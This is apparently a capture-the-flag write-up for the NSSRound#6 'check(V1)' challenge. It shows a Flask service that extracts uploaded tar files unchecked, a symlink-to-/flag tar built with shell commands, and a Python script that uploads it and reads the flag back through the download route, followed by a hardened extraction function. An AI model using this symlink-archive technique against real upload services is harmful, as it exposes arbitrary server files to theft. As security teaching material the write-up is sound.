[NSSRound#6 Team]check(V1)

Source code:

# -*- coding: utf-8 -*-
from flask import Flask,request
import tarfile
import os

app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = './uploads'
app.config['MAX_CONTENT_LENGTH'] = 100 * 1024
ALLOWED_EXTENSIONS = set(['tar'])

def allowed_file(filename):
    return '.' in filename and \
        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS

@app.route('/')
def index():
    with open(__file__, 'r') as f:
        return f.read()

@app.route('/upload', methods=['POST'])
def upload_file():
    if 'file' not in request.files:
        return '?'
    file = request.files['file']
    if file.filename == '':
        return '?'
    print(file.filename)
    if file and allowed_file(file.filename) and '..' not in file.filename and '/' not in file.filename:
        file_save_path = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)
        if(os.path.exists(file_save_path)):
            return 'This file already exists'
        file.save(file_save_path)
    else:
        return 'This file is not a tarfile'
    try:
        tar = tarfile.open(file_save_path, "r")
        tar.extractall(app.config['UPLOAD_FOLDER'])
    except Exception as e:
        return str(e)
    os.remove(file_save_path)
    return 'success'

@app.route('/download', methods=['POST'])
def download_file():
    filename = request.form.get('filename')
    if filename is None or filename == '':
        return '?'
    
    filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)
    
    if '..' in filename or '/' in filename:
        return '?'
    
    if not os.path.exists(filepath) or not os.path.isfile(filepath):
        return '?'
    
    with open(filepath, 'r') as f:
        return f.read()
    
@app.route('/clean', methods=['POST'])
def clean_file():
    os.system('/tmp/clean.sh')
    return 'success'

if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True, port=80)

tar = tarfile.open(file_save_path, "r")
tar.extractall(app.config['UPLOAD_FOLDER'])

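# This code has a file path injection vulnerability.
# File path injection: if the value of file_save_path comes from user input or another untrusted source, there is a risk of path injection. An attacker can craft a malicious path to access other files or directories on the system.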

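Approach:

This challenge only accepts tar uploads. We can upload a tar file that contains a symbolic link pointing to the flag, then use the download route to download that file and obtain the flag.

Solution: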

ln -s /flag flag
tar -cvf flag.tar flag

Use the following script to upload the archive, then download the flag and print it.

import requests as req

url = "http://node2.anna.nssctf.cn:28339/"
filename = r"D:/flag.tar"

def upload(url, fileName):
    # POST the tar archive to the /upload route as the "file" form field
    url = url + "upload"
    with open(fileName, 'rb') as f:
        response = req.post(url=url, files={"file": f})
    print(response.text)

def download(url):
    # Request the extracted member "flag" through the /download route
    url = url + "download"
    file = {"filename": "flag"}
    response = req.post(url, data=file)
    print(response.text)

if __name__ == "__main__":
    upload(url, filename)
    download(url)
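
The symlink member gets through because /upload calls extractall on the uploaded archive without inspecting its members. As an added example (not part of the original post or the challenge code), here is a hardened extraction step that validates every member before anything is written. The names safe_extract, build_tar and demo are hypothetical, and the sample archives are constructed in memory.

```python
import io
import os
import tarfile
import tempfile

def safe_extract(fileobj, dest):
    """Extract an uploaded tar into dest; raise ValueError before writing anything."""
    root = os.path.realpath(dest)
    with tarfile.open(fileobj=fileobj, mode="r") as tar:
        members = tar.getmembers()
        for m in members:
            # Refuse symlinks, hard links, devices and FIFOs: a link member
            # such as flag -> /flag is what /download would later follow.
            if not (m.isreg() or m.isdir()):
                raise ValueError(f"refused non-regular member: {m.name!r}")
            target = os.path.realpath(os.path.join(root, m.name))
            if os.path.commonpath([root, target]) != root:
                raise ValueError(f"refused path outside dest: {m.name!r}")
        tar.extractall(root, members=members)
    return [m.name for m in members]

def build_tar(entries):
    """Constructed sample input: entries are (name, kind, payload) tuples."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, kind, payload in entries:
            info = tarfile.TarInfo(name)
            if kind == "symlink":
                info.type, info.linkname = tarfile.SYMTYPE, payload
                tar.addfile(info)
            else:
                info.size = len(payload)
                tar.addfile(info, io.BytesIO(payload))
    buf.seek(0)
    return buf

def demo():
    samples = {"plain": [("note.txt", "file", b"hello")],
               "symlink": [("flag", "symlink", "/flag")],
               "traversal": [("../evil.txt", "file", b"x")]}
    results = {}
    with tempfile.TemporaryDirectory() as d:
        for label, entries in samples.items():
            try:
                results[label] = safe_extract(build_tar(entries), d)
            except ValueError:
                results[label] = "rejected"
        results["on_disk"] = sorted(os.listdir(d))
    return results
```

On Python 3.12 and later, passing filter="data" to extractall applies comparable checks inside the standard library.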

posted @ 2023-07-25 15:10  Magic水瓶